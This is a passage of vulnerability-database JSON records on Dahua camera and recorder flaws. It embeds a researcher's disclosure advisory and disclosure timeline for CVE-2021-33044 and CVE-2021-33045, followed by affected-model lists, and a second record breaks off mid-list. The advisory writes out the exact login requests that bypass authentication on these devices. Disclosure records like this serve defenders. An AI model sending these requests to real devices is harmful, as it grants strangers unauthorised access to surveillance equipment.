        "data": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis \u003cmcw noemail eu\u003e (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n               \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R\u0026D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n        \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n[Example]\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"loginType\": \"Direct\",\n        \"clientType\": \"NetKeyboard\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"Not Used\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"[REDACTED]\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Plain\",\n        \"password\": \"admin\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n[ETX]\n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          }
        ],
        "trust": 2.79
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33045",
            "trust": 4.6
          },
          {
            "db": "PACKETSTORM",
            "id": "164423",
            "trust": 2.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33045",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33045"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ]
      },
      "id": "VAR-202109-1874",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          }
        ],
        "trust": 2.2
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:16:17.179000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "DHCC-SA-202106-001",
            "trust": 0.8,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
          },
          {
            "title": "Patch for Dahua IPC Authentication Bypass Vulnerability (CNVD-2021-103420)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/311541"
          },
          {
            "title": "Patch for Identity authentication bypass vulnerability in some Dahua products (CNVD-2021-70815)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/290746"
          },
          {
            "title": "Dahua  IPC Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164676"
          },
          {
            "title": "PoC",
            "trust": 0.1,
            "url": "https://github.com/mcw0/poc "
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33045"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.0
          },
          {
            "problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html"
          },
          {
            "trust": 2.4,
            "url": "http://seclists.org/fulldisclosure/2021/oct/13"
          },
          {
            "trust": 2.3,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33045"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/mcw0/poc"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/mcw0/dahuaconsole"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33044"
          },
          {
            "trust": 0.1,
            "url": "https://www.dahuasecurity.com/support/downloadcenter/firmware"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33045"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33045"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-12-30T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "date": "2021-09-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "date": "2022-08-31T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "date": "2021-10-06T15:11:51",
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "date": "2021-09-15T22:15:10.687000",
            "db": "NVD",
            "id": "CVE-2021-33045"
          },
          {
            "date": "2021-09-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-01-18T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "date": "2021-09-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "date": "2022-08-31T02:43:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "date": "2021-12-02T13:49:55.440000",
            "db": "NVD",
            "id": "CVE-2021-33045"
          },
          {
            "date": "2021-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Dahua\u00a0 Product certification vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201309-0168

    Vulnerability from variot - Updated: 2023-12-18 12:09

    Dahua DVR appliances do not properly restrict UPnP requests, which makes it easier for remote attackers to obtain access via vectors involving a replay attack against the TELNET port. Digital video recorders (DVR) produced by Dahua Technology Co., Ltd. contain multiple vulnerabilities that could allow a remote attacker to gain privileged access to the devices. Dahua Security DVR Appliances accept UPnP requests from external untrusted devices, which can cause the telnet port of the DVR application device to be automatically redirected and accessed by external entities. These default conditions allow external attackers to detect the device and use the built-in account to authenticate. Access the device. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201309-0168",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "dvr2104c",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2116hc",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2116he",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5204a",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2108hc",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2104hc",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2108he",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2116c",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5216l",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2108c",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hf-al-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr3204hf-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hf-s-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804hf-l-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5404",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hf-a-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr3224l",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5116h",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5116he",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5808",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804hd-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr1604hf-s-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hd-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2104he",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2108h",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2404lf-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr6404lf-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hd-a",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804hf-s-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr1604hd-l",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5208a",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr3204lf-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5108h",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804hf-al-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr1604hf-u-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5108c",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr3204lf-al",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2404hf-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2404lf-al",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr1604hd-s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5104he",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5208l",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hd-l",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2104h",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5108he",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5216a",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5816",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hd-u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5104c",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr1604hf-l-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5204l",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5408",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804hf-a-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804hf-u-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr3232l",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5804",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr1604hf-a-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0804hd-l",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5104h",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hf-u-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr2116h",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5416",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr5116c",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr1604hf-al-e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dvr0404hd-a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0404hd-l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0404hd-s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0404hd-u",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0404hf-a-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0404hf-al-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0404hf-s-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0404hf-u-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804hd-l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804hd-s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804hf-a-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804hf-al-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804hf-l-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804hf-s-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr0804hf-u-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr1604hd-l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr1604hd-s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr1604hf-a-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr1604hf-al-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr1604hf-l-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr1604hf-s-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr1604hf-u-e",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2104c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2104h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2104hc",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2104he",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2108c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2108h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2108hc",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2108he",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2116c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2116h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2116hc",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2116he",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2404hf-s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2404lf-al",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr2404lf-s",
            "scope": null,
            "trust": 0.8,
